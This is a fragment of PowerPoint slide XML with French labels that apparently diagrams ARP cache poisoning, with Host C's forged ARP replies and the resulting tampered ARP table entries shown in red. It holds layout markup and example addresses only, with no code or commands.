          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="37" name="Tableau 36"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1451065428"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2446235" y="3042593"/>
          <a:ext cx="2465658" cy="518160"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{21E4AEA4-8DFA-4A89-87EB-49C32662AFE0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2465658"/>
              </a:tblGrid>
              <a:tr h="309251">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>ARP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>reply</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>192.168.1.2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>is</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>at</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>cccc:cccc:cccc</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="58738" y="5464175"/>
            <a:ext cx="2805112"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5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="65088" y="5470525"/>
            <a:ext cx="278606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6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="65088" y="5780088"/>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Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1574800" y="5780088"/>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Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="65088" y="6089650"/>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Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1574800" y="6089650"/>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Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="65088" y="6399213"/>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Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1574800" y="6399213"/>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Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1574800" y="5773738"/>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0" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="58738" y="5780088"/>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1" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="58738" y="6089650"/>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2" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="58738" y="6399213"/>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3" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="65088" y="5464175"/>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4" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2851150" y="5464175"/>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5" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="58738" y="5470525"/>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6" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="58738" y="6708775"/>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7" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1003300" y="5518150"/>
            <a:ext cx="10175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ARP TABLE A</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58" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="157163" y="5822950"/>
            <a:ext cx="4730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MAC</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59" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1666875" y="5822950"/>
            <a:ext cx="24606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60" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="157163" y="6132513"/>
            <a:ext cx="14001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err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bbbb:bbbb:bbbb</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61" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1666875" y="6132513"/>
            <a:ext cx="10175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192.168.1.2</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62" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="157162" y="6119018"/>
            <a:ext cx="10002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sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ccc:cccc:cccc</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9102834" y="5421312"/>
            <a:ext cx="2805112"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5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9109184" y="5427662"/>
            <a:ext cx="278606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
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9109184" y="5737225"/>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7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10618896" y="5737225"/>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8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9109184" y="6046787"/>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9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10618896" y="6046787"/>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10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9109184" y="6356350"/>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Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10618896" y="6356350"/>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Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10618896" y="5730875"/>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2" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9102834" y="5737225"/>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3" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9102834" y="6046787"/>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4" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9102834" y="6356350"/>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5" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9109184" y="5421312"/>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6" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11895246" y="5421312"/>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7" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9102834" y="5427662"/>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8" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9102834" y="6665912"/>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9" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10047396" y="5475287"/>
            <a:ext cx="10175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ARP TABLE A</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80" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9201259" y="5780087"/>
            <a:ext cx="4730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MAC</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81" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10710971" y="5780087"/>
            <a:ext cx="24606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82" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9201259" y="6089650"/>
            <a:ext cx="1134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sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>aaaa:aaaa:aaaa</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83" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10710971" y="6089650"/>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192.168.1.1</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84" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9201258" y="6076155"/>
            <a:ext cx="10002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sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ccc:cccc:cccc</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="85" name="Connecteur en angle 84"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5886671" y="2842196"/>
            <a:ext cx="3863714" cy="791925"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 274"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="92" name="Tableau 91"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1451495650"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6348788" y="3040673"/>
          <a:ext cx="2465658" cy="518160"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{21E4AEA4-8DFA-4A89-87EB-49C32662AFE0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2465658"/>
              </a:tblGrid>
              <a:tr h="309251">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>ARP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>reply</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>192.168.1.1 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>is</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>at</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>cccc:cccc:cccc</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="94" name="Tableau 93"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6232733" y="1619159"/>
          <a:ext cx="2798894" cy="944546"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="995673"/>
                <a:gridCol w="1803221"/>
              </a:tblGrid>
              <a:tr h="325554">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Hote</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> C</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" smtClean="0"/>
                        <a:t>MAC</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>cccc:cccc:cccc</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" smtClean="0"/>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>192.168.1.3</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="271930"/>
            <a:ext cx="27876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6" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="581493"/>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Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="581493"/>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8" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="891055"/>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9" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="891055"/>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Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="1200618"/>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Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="1200618"/>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2" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="575143"/>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3" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="581493"/>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4" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="891055"/>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5" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="1200618"/>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6" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="265580"/>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7" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9021521" y="265580"/>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8" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="271930"/>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9" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="1510180"/>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0" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7172084" y="319555"/>
            <a:ext cx="9108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ARP TABLE C</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111" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6325946" y="624355"/>
            <a:ext cx="474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MAC</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112" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842009" y="624355"/>
            <a:ext cx="2460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113" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
